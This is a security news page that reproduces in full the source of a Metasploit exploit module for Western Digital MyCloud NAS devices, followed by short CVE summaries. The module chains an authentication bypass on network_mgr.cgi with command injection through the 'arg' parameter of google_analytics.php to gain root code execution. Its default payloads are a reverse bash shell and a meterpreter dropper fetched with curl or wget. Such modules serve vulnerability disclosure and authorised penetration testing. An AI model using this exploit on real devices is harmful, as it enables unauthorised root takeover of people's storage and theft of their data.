Security
Headlines
HeadlinesLatestCVEs

Headline

Western Digital MyCloud Unauthenticated Command Injection

This Metasploit module exploits authentication bypass (CVE-2018-17153) and command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196 in order to achieve unauthenticated remote code execution as the root user. The module first performs a check to see if the target is WD MyCloud. If so, it attempts to trigger an authentication bypass (CVE-2018-17153) via a crafted GET request to /cgi-bin/network_mgr.cgi. If the server responds as expected, the module assesses the vulnerability status by attempting to exploit a commend injection vulnerability (CVE-2016-10108) in order to print a random string via the echo command. This is done via a crafted POST request to /web/google_analytics.php. If the server is vulnerable, the same command injection vector is leveraged to execute the payload. This module has been successfully tested against Western Digital MyCloud version 2.30.183.

Packet Storm
#vulnerability#web#google#linux#git#php#rce#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Western Digital MyCloud unauthenticated command injection',        'Description' => %q{          This module exploits authentication bypass (CVE-2018-17153) and          command injection (CVE-2016-10108) vulnerabilities in Western          Digital MyCloud before 2.30.196 in order to achieve          unauthenticated remote code execution as the root user.          The module first performs a check to see if the target is          WD MyCloud. If so, it attempts to trigger an authentication          bypass (CVE-2018-17153) via a crafted GET request to          /cgi-bin/network_mgr.cgi. If the server responds as expected,          the module assesses the vulnerability status by attempting to          exploit a commend injection vulnerability (CVE-2016-10108) in          order to print a random string via the echo command. This is          done via a crafted POST request to /web/google_analytics.php.          If the server is vulnerable, the same command injection vector          is leveraged to execute the payload.          This module has been successfully tested against Western Digital          MyCloud version 2.30.183.          Note: based on the available disclosures, it seems that the          command injection vector (CVE-2016-10108) might be exploitable          without the authentication bypass (CVE-2018-17153) on versions          before 2.21.126. The obtained results on 2.30.183 imply that          the patch for CVE-2016-10108 did not actually remove the command          injection vector, but only prevented unauthenticated access to it.        },        'License' => MSF_LICENSE,        'Author' => [          'Erik Wynter', # @wyntererik - Metasploit          'Steven Campbell', # CVE-2016-10108 disclosure and PoC          'Remco Vermeulen' # CVE-2018-17153 disclosure and PoC        ],        'References' => [          ['CVE', '2016-10108'], # command injection in /web/google_analytics.php via a modified arg parameter in the POST data.          ['CVE', '2018-17153'], # authentication bypass          ['URL', 'https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/'], # CVE-2018-17153 disclosure and PoC          ['URL', 'https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/'] # CVE-2016-10108 disclosure and PoC        ],        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Platform' => %w[linux unix],        'Arch' => [ ARCH_ARMLE, ARCH_CMD ],        'Targets' => [          [            'Unix In-Memory',            {              'Platform' => [ 'unix', 'linux' ],              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },              'Type' => :unix_memory            }          ],          [            'Linux Dropper', {              'Arch' => [ARCH_ARMLE],              'Platform' => 'linux',              'DefaultOptions' => {                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',                'CMDSTAGER::FLAVOR' => :curl              },              'Type' => :linux_dropper            }          ]        ],        'CmdStagerFlavor' => ['curl', 'wget'],        'Privileged' => true,        'DisclosureDate' => '2016-12-14', # CVE-2016-10108 disclosure date        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The base path to WD MyCloud', '/']),    ])  end  def check    # sanity check to see if the target is likely WD MyCloud    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    })    return CheckCode::Unknown('Connection failed.') unless res    return CheckCode::Safe('Target is not a WD MyCloud application.') unless res.code == 200 && res.body.include?('var MODEL_ID = "WDMyCloud')    print_status("#{rhost}:#{rport} - The target is WD MyCloud. Checking vulnerability status...")    # try the authentication bypass (CVE-2018-17153)    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'network_mgr.cgi'),      'vars_get' => {        'cmd' => 'cgi_get_ipv6',        'flag' => 1 # this cannot be randomized according to the CVE-2018-17153 details      }    })    return CheckCode::Unknown('Connection failed while attempting to trigger the authentication bypass.') unless res    return CheckCode::Unknown("Received unexpected response code #{res.code} while attempting to trigger the authentication bypass.") unless res.code == 404    # send a command to print a random string via echo. if the target is vulnerable, both the command  and the command output will be part of the response body    echo_cmd = "echo #{Rex::Text.rand_text_alphanumeric(8..42)}"    print_status("#{rhost}:#{rport} - Attempting to execute #{echo_cmd}...")    res = execute_command(echo_cmd, { 'wait_for_response' => true })    return CheckCode::Unknown('Connection failed while trying to execute the echo command to check the vulnerability status.') unless res    return CheckCode::Vulnerable('The target executed the echo command.') if res.code == 200 && res.body.include?(echo_cmd) && res.body.include?('"success":true')    CheckCode::Safe('The target failed to execute the echo command.')  end  def execute_command(cmd, opts = {})    request_hash = {      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'web', 'google_analytics.php'),      'cookie' => 'username=admin',      'vars_post' => {        'cmd' => 'set',        'opt' => 'cloud-device-num',        'arg' => "0|echo `#{cmd}` #"      }    }    return send_request_cgi(request_hash) if opts['wait_for_response']    # if we are trying to execute the payload, we can just yeet it at the server and return without waiting for a response    send_request_cgi(request_hash, 0)  end  def exploit    if target.arch.first == ARCH_CMD      print_status("#{rhost}:#{rport} - Executing the payload. This may take a few seconds...")      execute_command(payload.encoded)    else      execute_cmdstager(background: true)    end  endend

Related news

CVE-2018-17153: Authentication bypass vulnerability in Western Digital My Cloud allows escalation to admin privileges

It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called "cgi_get_ipv6" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter "flag" with the value "1" is provided. Subsequent invoc...

CVE-2016-10108

Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution